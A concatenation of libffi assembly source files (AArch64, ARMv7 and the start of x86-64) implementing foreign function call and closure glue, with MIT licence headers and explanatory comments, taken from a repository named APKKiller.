22: uxth w0, w0 /* UINT16 */
str x0, [x3]
23: ret /* reserved */
nop
24: mov w0, w0 /* UINT32 */
str x0, [x3]
25: ret /* reserved */
nop
26: sxtb x0, w0 /* SINT8 */
str x0, [x3]
27: ret /* reserved */
nop
28: sxth x0, w0 /* SINT16 */
str x0, [x3]
29: ret /* reserved */
nop
30: sxtw x0, w0 /* SINT32 */
str x0, [x3]
31: ret /* reserved */
nop
cfi_endproc
.globl CNAME(ffi_call_SYSV)
#ifdef __ELF__
.type CNAME(ffi_call_SYSV), #function
.hidden CNAME(ffi_call_SYSV)
.size CNAME(ffi_call_SYSV), .-CNAME(ffi_call_SYSV)
#endif
/* ffi_closure_SYSV
Closure invocation glue. This is the low level code invoked directly by
the closure trampoline to setup and call a closure.
On entry x17 points to a struct ffi_closure, x16 has been clobbered
all other registers are preserved.
We allocate a call context and save the argument passing registers,
then invoked the generic C ffi_closure_SYSV_inner() function to do all
the real work, on return we load the result passing registers back from
the call context.
*/
#define ffi_closure_SYSV_FS (8*2 + CALL_CONTEXT_SIZE + 64)
.align 4
/* Vector-register variant of the closure entry point: allocates the
   closure frame, saves the argument-passing q registers, then joins
   the common path (label 0 in ffi_closure_SYSV) which saves the core
   argument registers and calls ffi_closure_SYSV_inner. */
CNAME(ffi_closure_SYSV_V):
cfi_startproc
stp x29, x30, [sp, #-ffi_closure_SYSV_FS]!
cfi_adjust_cfa_offset (ffi_closure_SYSV_FS)
cfi_rel_offset (x29, 0)
cfi_rel_offset (x30, 8)
/* Save the argument passing vector registers. */
stp q0, q1, [sp, #16 + 0]
stp q2, q3, [sp, #16 + 32]
stp q4, q5, [sp, #16 + 64]
stp q6, q7, [sp, #16 + 96]
b 0f /* continue on the common closure path below */
cfi_endproc
.globl CNAME(ffi_closure_SYSV_V)
#ifdef __ELF__
.type CNAME(ffi_closure_SYSV_V), #function
.hidden CNAME(ffi_closure_SYSV_V)
.size CNAME(ffi_closure_SYSV_V), . - CNAME(ffi_closure_SYSV_V)
#endif
/* ffi_closure_SYSV
   Integer-only closure entry; also hosts the shared tail (label 0) used
   by ffi_closure_SYSV_V.  Saves the x0-x7 argument registers into the
   call context, calls ffi_closure_SYSV_inner to marshal arguments and
   run the user function, then dispatches on the returned type code to
   load the native return registers from the rvalue area.  */
.align 4
cfi_startproc
CNAME(ffi_closure_SYSV):
stp x29, x30, [sp, #-ffi_closure_SYSV_FS]!
cfi_adjust_cfa_offset (ffi_closure_SYSV_FS)
cfi_rel_offset (x29, 0)
cfi_rel_offset (x30, 8)
/* Shared with ffi_closure_SYSV_V, which branches here after spilling
   q0-q7.  */
0:
mov x29, sp
/* Save the argument passing core registers. */
stp x0, x1, [sp, #16 + 16*N_V_ARG_REG + 0]
stp x2, x3, [sp, #16 + 16*N_V_ARG_REG + 16]
stp x4, x5, [sp, #16 + 16*N_V_ARG_REG + 32]
stp x6, x7, [sp, #16 + 16*N_V_ARG_REG + 48]
/* Load ffi_closure_inner arguments. */
ldp PTR_REG(0), PTR_REG(1), [x17, #FFI_TRAMPOLINE_CLOSURE_OFFSET] /* load cif, fn */
ldr PTR_REG(2), [x17, #FFI_TRAMPOLINE_CLOSURE_OFFSET+PTR_SIZE*2] /* load user_data */
/* Also the branch target of ffi_go_closure_SYSV, which arrives with
   cif/fn/user_data already in x0-x2.  */
.Ldo_closure:
add x3, sp, #16 /* load context */
add x4, sp, #ffi_closure_SYSV_FS /* load stack */
add x5, sp, #16+CALL_CONTEXT_SIZE /* load rvalue */
mov x6, x8 /* load struct_rval */
bl CNAME(ffi_closure_SYSV_inner)
/* Load the return value as directed. */
/* w0 holds the AARCH64_RET_* code; index into the 8-byte-per-entry
   table below and jump.  x3 points at the rvalue scratch area.  */
adr x1, 0f
and w0, w0, #AARCH64_RET_MASK
add x1, x1, x0, lsl #3
add x3, sp, #16+CALL_CONTEXT_SIZE
br x1
/* Note that each table entry is 2 insns, and thus 8 bytes. */
.align 4
0: b 99f /* VOID */
nop
1: ldr x0, [x3] /* INT64 */
b 99f
2: ldp x0, x1, [x3] /* INT128 */
b 99f
3: brk #1000 /* UNUSED */
nop
4: brk #1000 /* UNUSED */
nop
5: brk #1000 /* UNUSED */
nop
6: brk #1000 /* UNUSED */
nop
7: brk #1000 /* UNUSED */
nop
/* Homogeneous FP aggregates: entries 8/9 deliberately fall through so
   S4 loads s3, then s2, then the final pair at entry 10.  Same scheme
   for the D and Q variants below.  */
8: ldr s3, [x3, #12] /* S4 */
nop
9: ldr s2, [x3, #8] /* S3 */
nop
10: ldp s0, s1, [x3] /* S2 */
b 99f
11: ldr s0, [x3] /* S1 */
b 99f
12: ldr d3, [x3, #24] /* D4 */
nop
13: ldr d2, [x3, #16] /* D3 */
nop
14: ldp d0, d1, [x3] /* D2 */
b 99f
15: ldr d0, [x3] /* D1 */
b 99f
16: ldr q3, [x3, #48] /* Q4 */
nop
17: ldr q2, [x3, #32] /* Q3 */
nop
18: ldp q0, q1, [x3] /* Q2 */
b 99f
19: ldr q0, [x3] /* Q1 */
b 99f
/* Small integers: BE() adjusts the byte offset on big-endian targets
   so the narrow load picks up the low-order bytes of the slot.  */
20: ldrb w0, [x3, #BE(7)] /* UINT8 */
b 99f
21: brk #1000 /* reserved */
nop
22: ldrh w0, [x3, #BE(6)] /* UINT16 */
b 99f
23: brk #1000 /* reserved */
nop
24: ldr w0, [x3, #BE(4)] /* UINT32 */
b 99f
25: brk #1000 /* reserved */
nop
26: ldrsb x0, [x3, #BE(7)] /* SINT8 */
b 99f
27: brk #1000 /* reserved */
nop
28: ldrsh x0, [x3, #BE(6)] /* SINT16 */
b 99f
29: brk #1000 /* reserved */
nop
/* Entry 30 falls through entry 31 (empty) into the epilogue.  */
30: ldrsw x0, [x3, #BE(4)] /* SINT32 */
nop
31: /* reserved */
/* Common epilogue: restore fp/lr, pop the frame, return to the
   closure's caller.  */
99: ldp x29, x30, [sp], #ffi_closure_SYSV_FS
cfi_adjust_cfa_offset (-ffi_closure_SYSV_FS)
cfi_restore (x29)
cfi_restore (x30)
ret
cfi_endproc
.globl CNAME(ffi_closure_SYSV)
#ifdef __ELF__
.type CNAME(ffi_closure_SYSV), #function
.hidden CNAME(ffi_closure_SYSV)
.size CNAME(ffi_closure_SYSV), . - CNAME(ffi_closure_SYSV)
#endif
#if FFI_EXEC_TRAMPOLINE_TABLE
#ifdef __MACH__
#include <mach/machine/vm_param.h>
/* A page of identical trampolines for W^X targets (Mach-O).  Each
   trampoline pairs with a 16-byte config slot located exactly one page
   below it; the slot supplies the ffi_closure pointer (-> x17) and the
   real entry point (-> x16).  */
.align PAGE_MAX_SHIFT
CNAME(ffi_closure_trampoline_table_page):
.rept PAGE_MAX_SIZE / FFI_TRAMPOLINE_SIZE
/* x16 = this trampoline's config slot on the page below.  */
adr x16, -PAGE_MAX_SIZE
ldp x17, x16, [x16]
br x16
nop /* each entry in the trampoline config page is 2*sizeof(void*) so the trampoline itself cannot be smaller that 16 bytes */
.endr
.globl CNAME(ffi_closure_trampoline_table_page)
#ifdef __ELF__
.type CNAME(ffi_closure_trampoline_table_page), #function
.hidden CNAME(ffi_closure_trampoline_table_page)
.size CNAME(ffi_closure_trampoline_table_page), . - CNAME(ffi_closure_trampoline_table_page)
#endif
#endif
#endif /* FFI_EXEC_TRAMPOLINE_TABLE */
#ifdef FFI_GO_CLOSURES
/* ffi_go_closure_SYSV_V
   Go-closure variant of ffi_closure_SYSV_V: spill the vector argument
   registers, then join the Go-closure integer path (label 0 inside
   ffi_go_closure_SYSV).  The Go closure descriptor arrives in x18
   (see the loads in ffi_go_closure_SYSV).  */
.align 4
CNAME(ffi_go_closure_SYSV_V):
cfi_startproc
stp x29, x30, [sp, #-ffi_closure_SYSV_FS]!
cfi_adjust_cfa_offset (ffi_closure_SYSV_FS)
cfi_rel_offset (x29, 0)
cfi_rel_offset (x30, 8)
/* Save the argument passing vector registers. */
stp q0, q1, [sp, #16 + 0]
stp q2, q3, [sp, #16 + 32]
stp q4, q5, [sp, #16 + 64]
stp q6, q7, [sp, #16 + 96]
b 0f
cfi_endproc
.globl CNAME(ffi_go_closure_SYSV_V)
#ifdef __ELF__
.type CNAME(ffi_go_closure_SYSV_V), #function
.hidden CNAME(ffi_go_closure_SYSV_V)
.size CNAME(ffi_go_closure_SYSV_V), . - CNAME(ffi_go_closure_SYSV_V)
#endif
/* ffi_go_closure_SYSV
   Like ffi_closure_SYSV, but for Go closures: cif and fn come from the
   descriptor in x18, and the descriptor itself becomes user_data.
   After loading them it reuses the common .Ldo_closure tail in
   ffi_closure_SYSV.  */
.align 4
cfi_startproc
CNAME(ffi_go_closure_SYSV):
stp x29, x30, [sp, #-ffi_closure_SYSV_FS]!
cfi_adjust_cfa_offset (ffi_closure_SYSV_FS)
cfi_rel_offset (x29, 0)
cfi_rel_offset (x30, 8)
/* ffi_go_closure_SYSV_V branches here after saving q0-q7.  */
0:
mov x29, sp
/* Save the argument passing core registers. */
stp x0, x1, [sp, #16 + 16*N_V_ARG_REG + 0]
stp x2, x3, [sp, #16 + 16*N_V_ARG_REG + 16]
stp x4, x5, [sp, #16 + 16*N_V_ARG_REG + 32]
stp x6, x7, [sp, #16 + 16*N_V_ARG_REG + 48]
/* Load ffi_closure_inner arguments. */
ldp PTR_REG(0), PTR_REG(1), [x18, #PTR_SIZE]/* load cif, fn */
mov x2, x18 /* load user_data */
b .Ldo_closure
cfi_endproc
.globl CNAME(ffi_go_closure_SYSV)
#ifdef __ELF__
.type CNAME(ffi_go_closure_SYSV), #function
.hidden CNAME(ffi_go_closure_SYSV)
.size CNAME(ffi_go_closure_SYSV), . - CNAME(ffi_go_closure_SYSV)
#endif
#endif /* FFI_GO_CLOSURES */
#if defined __ELF__ && defined __linux__
.section .note.GNU-stack,"",%progbits
#endif
#endif
|
aimardcr/APKKiller
| 9,731
|
app/src/main/cpp/whale/src/libffi/arm/sysv_armv7.S
|
#ifdef __arm__
/* -----------------------------------------------------------------------
sysv.S - Copyright (c) 1998, 2008, 2011 Red Hat, Inc.
Copyright (c) 2011 Plausible Labs Cooperative, Inc.
ARM Foreign Function Interface
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
#include <ffi_cfi.h>
#include "internal.h"
/* GCC 4.8 provides __ARM_ARCH; construct it otherwise. */
#ifndef __ARM_ARCH
# if defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) \
|| defined(__ARM_ARCH_7R__) || defined(__ARM_ARCH_7M__) \
|| defined(__ARM_ARCH_7EM__)
# define __ARM_ARCH 7
# elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) \
|| defined(__ARM_ARCH_6K__) || defined(__ARM_ARCH_6Z__) \
|| defined(__ARM_ARCH_6ZK__) || defined(__ARM_ARCH_6T2__) \
|| defined(__ARM_ARCH_6M__)
# define __ARM_ARCH 6
# elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5T__) \
|| defined(__ARM_ARCH_5E__) || defined(__ARM_ARCH_5TE__) \
|| defined(__ARM_ARCH_5TEJ__)
# define __ARM_ARCH 5
# else
# define __ARM_ARCH 4
# endif
#endif
/* Conditionally compile unwinder directives. */
#ifdef __ARM_EABI__
# define UNWIND(...) __VA_ARGS__
#else
# define UNWIND(...)
#endif
#if defined(HAVE_AS_CFI_PSEUDO_OP) && defined(__ARM_EABI__)
.cfi_sections .debug_frame
#endif
#define CONCAT(a, b) CONCAT2(a, b)
#define CONCAT2(a, b) a ## b
#ifdef __USER_LABEL_PREFIX__
# define CNAME(X) CONCAT (__USER_LABEL_PREFIX__, X)
#else
# define CNAME(X) X
#endif
#ifdef __ELF__
# define SIZE(X) .size CNAME(X), . - CNAME(X)
# define TYPE(X, Y) .type CNAME(X), Y
#else
# define SIZE(X)
# define TYPE(X, Y)
#endif
#define ARM_FUNC_START_LOCAL(name) \
.align 3; \
TYPE(CNAME(name), %function); \
CNAME(name):
#define ARM_FUNC_START(name) \
.globl CNAME(name); \
FFI_HIDDEN(CNAME(name)); \
ARM_FUNC_START_LOCAL(name)
#define ARM_FUNC_END(name) \
SIZE(name)
/* Aid in defining a jump table with 8 bytes between entries. */
/* ??? The clang assembler doesn't handle .if with symbolic expressions. */
#ifdef __clang__
# define E(index)
#else
# define E(index) \
.if . - 0b - 8*index; \
.error "type table out of sync"; \
.endif
#endif
.text
.syntax unified
.arm
#ifndef __clang__
/* We require interworking on LDM, which implies ARMv5T,
which implies the existance of BLX. */
.arch armv5t
#endif
/* Note that we use STC and LDC to encode VFP instructions,
so that we do not need ".fpu vfp", nor get that added to
the object file attributes. These will not be executed
unless the FFI_VFP abi is used. */
@ r0: stack
@ r1: frame
@ r2: fn
@ r3: vfp_used
@ ffi_call_VFP: VFP-ABI entry for ffi_call.
@ In: r0 = prepared argument stack, r1 = frame, r2 = fn, r3 = vfp_used
@     (count of VFP argument registers needed; see comment block above).
@ Loads d0-d7 (or just d0 when vfp_used <= 3) from the start of the
@ argument stack, skips those 64 bytes, then falls through into
@ ffi_call_SYSV for the core-register/stack portion.
ARM_FUNC_START(ffi_call_VFP)
UNWIND(.fnstart)
cfi_startproc
cmp r3, #3 @ load only d0 if possible
#ifdef __clang__
vldrle d0, [sp]
vldmgt sp, {d0-d7}
#else
@ LDC encodings used so no ".fpu vfp" directive is required (see note
@ above); they execute only under the FFI_VFP ABI.
ldcle p11, cr0, [r0] @ vldrle d0, [sp]
ldcgt p11, cr0, [r0], {16} @ vldmgt sp, {d0-d7}
#endif
add r0, r0, #64 @ discard the vfp register args
/* FALLTHRU */
ARM_FUNC_END(ffi_call_VFP)
@ ffi_call_SYSV: core ffi_call path (also the tail of ffi_call_VFP).
@ In: r0 = argument stack, r1 = frame (holds saved fp/lr, rvalue ptr at
@ +8, return-type code at +12, static chain at +16), r2 = fn.
@ Installs the prepared stack, pops r0-r3 as the first four arguments,
@ calls fn, then dispatches on the return-type code to store the
@ register return value through the rvalue pointer.
ARM_FUNC_START(ffi_call_SYSV)
stm r1, {fp, lr}
mov fp, r1
@ This is a bit of a lie wrt the origin of the unwind info, but
@ now we've got the usual frame pointer and two saved registers.
UNWIND(.save {fp,lr})
UNWIND(.setfp fp, sp)
cfi_def_cfa(fp, 8)
cfi_rel_offset(fp, 0)
cfi_rel_offset(lr, 4)
mov sp, r0 @ install the stack pointer
mov lr, r2 @ move the fn pointer out of the way
ldr ip, [fp, #16] @ install the static chain
ldmia sp!, {r0-r3} @ move first 4 parameters in registers.
blx lr @ call fn
@ Load r2 with the pointer to storage for the return value
@ Load r3 with the return type code
ldr r2, [fp, #8]
ldr r3, [fp, #12]
@ Deallocate the stack with the arguments.
mov sp, fp
cfi_def_cfa_register(sp)
@ Store values stored in registers.
@ Jump table: pc reads as this insn's address + 8 in ARM state, so
@ entry 0 (label 0 below) sits exactly 8 bytes past the add; each
@ E()-checked entry is 8 bytes (2 insns).
.align 3
add pc, pc, r3, lsl #3
nop
0:
E(ARM_TYPE_VFP_S)
#ifdef __clang__
vstr s0, [r2]
#else
stc p10, cr0, [r2] @ vstr s0, [r2]
#endif
pop {fp,pc}
E(ARM_TYPE_VFP_D)
#ifdef __clang__
vstr d0, [r2]
#else
stc p11, cr0, [r2] @ vstr d0, [r2]
#endif
pop {fp,pc}
E(ARM_TYPE_VFP_N)
#ifdef __clang__
vstm r2, {d0-d3}
#else
stc p11, cr0, [r2], {8} @ vstm r2, {d0-d3}
#endif
pop {fp,pc}
@ INT64 stores the high word, then falls through into INT to store
@ the low word and return.
E(ARM_TYPE_INT64)
str r1, [r2, #4]
nop
E(ARM_TYPE_INT)
str r0, [r2]
pop {fp,pc}
E(ARM_TYPE_VOID)
pop {fp,pc}
nop
@ STRUCT: value already written via the hidden pointer; nothing to do.
E(ARM_TYPE_STRUCT)
pop {fp,pc}
cfi_endproc
UNWIND(.fnend)
ARM_FUNC_END(ffi_call_SYSV)
/*
int ffi_closure_inner_* (cif, fun, user_data, frame)
*/
@ ffi_go_closure_SYSV: Go-closure entry, core-register ABI.
@ The Go closure descriptor arrives in ip; cif and fun are read from it
@ and the descriptor itself is passed as user_data, then control joins
@ the common path (label 0) in ffi_closure_SYSV.
ARM_FUNC_START(ffi_go_closure_SYSV)
cfi_startproc
stmdb sp!, {r0-r3} @ save argument regs
cfi_adjust_cfa_offset(16)
ldr r0, [ip, #4] @ load cif
ldr r1, [ip, #8] @ load fun
mov r2, ip @ load user_data
b 0f
cfi_endproc
ARM_FUNC_END(ffi_go_closure_SYSV)
@ ffi_closure_SYSV: closure entry, core-register ABI.
@ ip carries the ffi_closure pointer (or, with trampoline tables, a
@ pointer to its config-page slot).  Saves the argument registers,
@ builds a frame, calls ffi_closure_inner_SYSV (cif, fun, user_data,
@ frame), then dispatches through ffi_closure_ret on the returned
@ type code to load the native return registers.
ARM_FUNC_START(ffi_closure_SYSV)
UNWIND(.fnstart)
cfi_startproc
stmdb sp!, {r0-r3} @ save argument regs
cfi_adjust_cfa_offset(16)
#if FFI_EXEC_TRAMPOLINE_TABLE
ldr ip, [ip] @ ip points to the config page, dereference to get the ffi_closure*
#endif
ldr r0, [ip, #FFI_TRAMPOLINE_CLOSURE_OFFSET] @ load cif
ldr r1, [ip, #FFI_TRAMPOLINE_CLOSURE_OFFSET+4] @ load fun
ldr r2, [ip, #FFI_TRAMPOLINE_CLOSURE_OFFSET+8] @ load user_data
0:
add ip, sp, #16 @ compute entry sp
sub sp, sp, #64+32 @ allocate frame
cfi_adjust_cfa_offset(64+32)
@ Save entry sp and lr; ffi_closure_ret's "ldm sp, {sp,pc}" restores
@ both in one go.
stmdb sp!, {ip,lr}
/* Remember that EABI unwind info only applies at call sites.
We need do nothing except note the save of the stack pointer
and the link registers. */
UNWIND(.save {sp,lr})
cfi_adjust_cfa_offset(8)
cfi_rel_offset(lr, 4)
add r3, sp, #8 @ load frame
bl CNAME(ffi_closure_inner_SYSV)
@ Load values returned in registers.
add r2, sp, #8+64 @ load result
adr r3, CNAME(ffi_closure_ret)
add pc, r3, r0, lsl #3 @ index 8-byte entries by type code in r0
cfi_endproc
UNWIND(.fnend)
ARM_FUNC_END(ffi_closure_SYSV)
@ ffi_go_closure_VFP: Go-closure entry, VFP ABI.
@ Same shape as ffi_go_closure_SYSV (descriptor in ip), but joins the
@ VFP common path (label 0) in ffi_closure_VFP so d0-d7 get saved.
ARM_FUNC_START(ffi_go_closure_VFP)
cfi_startproc
stmdb sp!, {r0-r3} @ save argument regs
cfi_adjust_cfa_offset(16)
ldr r0, [ip, #4] @ load cif
ldr r1, [ip, #8] @ load fun
mov r2, ip @ load user_data
b 0f
cfi_endproc
ARM_FUNC_END(ffi_go_closure_VFP)
@ ffi_closure_VFP: closure entry, VFP ABI.
@ Identical to ffi_closure_SYSV except that d0-d7 are also saved into
@ the frame and the inner helper is ffi_closure_inner_VFP.
ARM_FUNC_START(ffi_closure_VFP)
UNWIND(.fnstart)
cfi_startproc
stmdb sp!, {r0-r3} @ save argument regs
cfi_adjust_cfa_offset(16)
#if FFI_EXEC_TRAMPOLINE_TABLE
ldr ip, [ip] @ ip points to the config page, dereference to get the ffi_closure*
#endif
ldr r0, [ip, #FFI_TRAMPOLINE_CLOSURE_OFFSET] @ load cif
ldr r1, [ip, #FFI_TRAMPOLINE_CLOSURE_OFFSET+4] @ load fun
ldr r2, [ip, #FFI_TRAMPOLINE_CLOSURE_OFFSET+8] @ load user_data
0:
add ip, sp, #16
sub sp, sp, #64+32 @ allocate frame
cfi_adjust_cfa_offset(64+32)
#ifdef __clang__
vstm sp, {d0-d7}
#else
@ STC encoding of vstm, avoiding a ".fpu vfp" requirement (see the
@ note near the top of the file).
stc p11, cr0, [sp], {16} @ vstm sp, {d0-d7}
#endif
stmdb sp!, {ip,lr}
/* See above. */
UNWIND(.save {sp,lr})
cfi_adjust_cfa_offset(8)
cfi_rel_offset(lr, 4)
add r3, sp, #8 @ load frame
bl CNAME(ffi_closure_inner_VFP)
@ Load values returned in registers.
add r2, sp, #8+64 @ load result
adr r3, CNAME(ffi_closure_ret)
add pc, r3, r0, lsl #3 @ index 8-byte entries by type code in r0
cfi_endproc
UNWIND(.fnend)
ARM_FUNC_END(ffi_closure_VFP)
/* Load values returned in registers for both closure entry points.
Note that we use LDM with SP in the register set. This is deprecated
by ARM, but not yet unpredictable. */
@ ffi_closure_ret: shared return-dispatch table for both closure entry
@ points.  On entry r2 points at the result area and sp points at the
@ {entry-sp, lr} pair saved by the caller, so "ldm sp, {sp,pc}" both
@ pops the closure frame and returns.  Each E()-checked entry is 8
@ bytes; the INT64 entry falls through into INT.
ARM_FUNC_START_LOCAL(ffi_closure_ret)
cfi_startproc
cfi_rel_offset(sp, 0)
cfi_rel_offset(lr, 4)
0:
E(ARM_TYPE_VFP_S)
#ifdef __clang__
vldr s0, [r2]
#else
ldc p10, cr0, [r2] @ vldr s0, [r2]
#endif
ldm sp, {sp,pc}
E(ARM_TYPE_VFP_D)
#ifdef __clang__
vldr d0, [r2]
#else
ldc p11, cr0, [r2] @ vldr d0, [r2]
#endif
ldm sp, {sp,pc}
E(ARM_TYPE_VFP_N)
#ifdef __clang__
vldm r2, {d0-d3}
#else
ldc p11, cr0, [r2], {8} @ vldm r2, {d0-d3}
#endif
ldm sp, {sp,pc}
@ INT64 loads the high word then falls through to load the low word.
E(ARM_TYPE_INT64)
ldr r1, [r2, #4]
nop
E(ARM_TYPE_INT)
ldr r0, [r2]
ldm sp, {sp,pc}
E(ARM_TYPE_VOID)
ldm sp, {sp,pc}
nop
E(ARM_TYPE_STRUCT)
ldm sp, {sp,pc}
cfi_endproc
ARM_FUNC_END(ffi_closure_ret)
#if FFI_EXEC_TRAMPOLINE_TABLE
#ifdef __MACH__
#include <mach/machine/vm_param.h>
@ W^X trampoline page (Mach-O): each trampoline reads its 8-byte config
@ slot one page below to find the closure (left in ip) and the entry
@ point to jump to.
.align PAGE_MAX_SHIFT
ARM_FUNC_START(ffi_closure_trampoline_table_page)
.rept PAGE_MAX_SIZE / FFI_TRAMPOLINE_SIZE
adr ip, #-PAGE_MAX_SIZE @ the config page is PAGE_MAX_SIZE behind the trampoline page
sub ip, #8 @ account for pc bias
ldr pc, [ip, #4] @ jump to ffi_closure_SYSV or ffi_closure_VFP
.endr
ARM_FUNC_END(ffi_closure_trampoline_table_page)
#endif
#else
@ Writable-code trampoline template: ip = trampoline address; the .long
@ slot is patched at closure-prep time with the target entry point.
ARM_FUNC_START(ffi_arm_trampoline)
0: adr ip, 0b
ldr pc, 1f
1: .long 0
ARM_FUNC_END(ffi_arm_trampoline)
#endif /* FFI_EXEC_TRAMPOLINE_TABLE */
#if defined __ELF__ && defined __linux__
.section .note.GNU-stack,"",%progbits
#endif
#endif
|
aimardcr/APKKiller
| 15,785
|
app/src/main/cpp/whale/src/libffi/x86/unix64_x86_64.S
|
#ifdef __x86_64__
/* -----------------------------------------------------------------------
unix64.S - Copyright (c) 2013 The Written Word, Inc.
- Copyright (c) 2008 Red Hat, Inc
- Copyright (c) 2002 Bo Thorsen <bo@suse.de>
x86-64 Foreign Function Interface
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
#ifdef __x86_64__
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
#include "internal64.h"
#include "asmnames.h"
.text
/* This macro allows the safe creation of jump tables without an
actual table. The entry points into the table are all 8 bytes.
The use of ORG asserts that we're at the correct location. */
/* ??? The clang assembler doesn't handle .org with symbolic expressions. */
#if defined(__clang__) || defined(__APPLE__) || (defined (__sun__) && defined(__svr4__))
# define E(BASE, X) .balign 8
#else
# define E(BASE, X) .balign 8; .org BASE + X * 8
#endif
/* ffi_call_unix64 (void *args, unsigned long bytes, unsigned flags,
void *raddr, void (*fnaddr)(void));
Bit o trickiness here -- ARGS+BYTES is the base of the stack frame
for this function. This has been allocated by ffi_call. We also
deallocate some of the stack that has been alloca'd. */
/* ffi_call_unix64 (args, bytes, flags, raddr, fnaddr):
   relocate the return address and caller state to the top of the
   prepared argument area (args+bytes), load the six integer argument
   registers (and optionally xmm0-xmm7), call fnaddr, then dispatch on
   the low byte of flags to store the return value through raddr.  */
.balign 8
.globl C(ffi_call_unix64)
FFI_HIDDEN(C(ffi_call_unix64))
C(ffi_call_unix64):
L(UW0):
movq (%rsp), %r10 /* Load return address. */
leaq (%rdi, %rsi), %rax /* Find local stack base. */
movq %rdx, (%rax) /* Save flags. */
movq %rcx, 8(%rax) /* Save raddr. */
movq %rbp, 16(%rax) /* Save old frame pointer. */
movq %r10, 24(%rax) /* Relocate return address. */
movq %rax, %rbp /* Finalize local stack frame. */
/* New stack frame based off rbp. This is a itty bit of unwind
trickery in that the CFA *has* changed. There is no easy way
to describe it correctly on entry to the function. Fortunately,
it doesn't matter too much since at all points we can correctly
unwind back to ffi_call. Note that the location to which we
moved the return address is (the new) CFA-8, so from the
perspective of the unwind info, it hasn't moved. */
L(UW1):
/* cfi_def_cfa(%rbp, 32) */
/* cfi_rel_offset(%rbp, 16) */
movq %rdi, %r10 /* Save a copy of the register area. */
movq %r8, %r11 /* Save a copy of the target fn. */
/* NOTE(review): %eax set here is dead -- it is overwritten by the
   load from 0xb0(%r10) below before any use.  Left as-is.  */
movl %r9d, %eax /* Set number of SSE registers. */
/* Load up all argument registers. */
movq (%r10), %rdi
movq 0x08(%r10), %rsi
movq 0x10(%r10), %rdx
movq 0x18(%r10), %rcx
movq 0x20(%r10), %r8
movq 0x28(%r10), %r9
movl 0xb0(%r10), %eax
testl %eax, %eax
jnz L(load_sse)
L(ret_from_load_sse):
/* Deallocate the reg arg area, except for r10, then load via pop. */
leaq 0xb8(%r10), %rsp
popq %r10
/* Call the user function. */
call *%r11
/* Deallocate stack arg area; local stack frame in redzone. */
leaq 24(%rbp), %rsp
movq 0(%rbp), %rcx /* Reload flags. */
movq 8(%rbp), %rdi /* Reload raddr. */
movq 16(%rbp), %rbp /* Reload old frame pointer. */
L(UW2):
/* cfi_remember_state */
/* cfi_def_cfa(%rsp, 8) */
/* cfi_restore(%rbp) */
/* The first byte of the flags contains the FFI_TYPE. */
/* Dispatch: each store_table entry is 8 bytes (enforced by E()).
   Out-of-range codes abort at L(sa).  */
cmpb $UNIX64_RET_LAST, %cl
movzbl %cl, %r10d
leaq L(store_table)(%rip), %r11
ja L(sa)
leaq (%r11, %r10, 8), %r10
/* Prep for the structure cases: scratch area in redzone. */
leaq -20(%rsp), %rsi
jmp *%r10
.balign 8
L(store_table):
E(L(store_table), UNIX64_RET_VOID)
ret
E(L(store_table), UNIX64_RET_UINT8)
movzbl %al, %eax
movq %rax, (%rdi)
ret
E(L(store_table), UNIX64_RET_UINT16)
movzwl %ax, %eax
movq %rax, (%rdi)
ret
E(L(store_table), UNIX64_RET_UINT32)
movl %eax, %eax
movq %rax, (%rdi)
ret
E(L(store_table), UNIX64_RET_SINT8)
movsbq %al, %rax
movq %rax, (%rdi)
ret
E(L(store_table), UNIX64_RET_SINT16)
movswq %ax, %rax
movq %rax, (%rdi)
ret
E(L(store_table), UNIX64_RET_SINT32)
cltq
movq %rax, (%rdi)
ret
E(L(store_table), UNIX64_RET_INT64)
movq %rax, (%rdi)
ret
E(L(store_table), UNIX64_RET_XMM32)
movd %xmm0, (%rdi)
ret
E(L(store_table), UNIX64_RET_XMM64)
movq %xmm0, (%rdi)
ret
E(L(store_table), UNIX64_RET_X87)
fstpt (%rdi)
ret
E(L(store_table), UNIX64_RET_X87_2)
fstpt (%rdi)
fstpt 16(%rdi)
ret
/* Two-register aggregates: stash the second register in the redzone
   scratch area, then merge at L(s2)/L(s3) and rep-copy size bytes
   (taken from the high bits of flags) to raddr.  */
E(L(store_table), UNIX64_RET_ST_XMM0_RAX)
movq %rax, 8(%rsi)
jmp L(s3)
